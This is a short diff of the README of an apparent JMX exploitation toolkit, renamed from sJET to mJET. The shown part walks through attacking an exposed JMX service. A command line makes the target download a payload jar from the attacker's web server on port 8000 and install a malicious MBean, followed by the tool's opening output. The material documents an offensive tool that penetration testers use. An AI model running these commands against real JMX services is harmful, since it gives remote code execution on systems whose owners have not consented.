siberas/sjet/README.md

 In the following example, the vulnerable JMX service runs on the 192.168.11.136:9991, the attacker has the IP address 192.168.11.132.
-The JMX service will connect to the web service of the attacker to download the payload jar file. sJET will start the necessary web service on port 8000.
+The JMX service will connect to the web service of the attacker to download the payload jar file. mJET will start the necessary web service on port 8000.

 After the successful installation of the MBean, the default password is changed to the password that was provided at the command line ("super_secret").

 ```
 h0ng10@rocksteady:~/sjet$ jython sjet.py 192.168.11.136 9991 super_secret install http://192.168.11.132:8000 8000
-sJET - siberas JMX Exploitation Toolkit
+mJET - MOGWAI LABS JMX Exploitation Toolkit
 =======================================
 [+] Starting webserver at port 8000
 [+] Connecting to: service:jmx:rmi:///jndi/rmi://192.168.11.136:9991/jmxrmi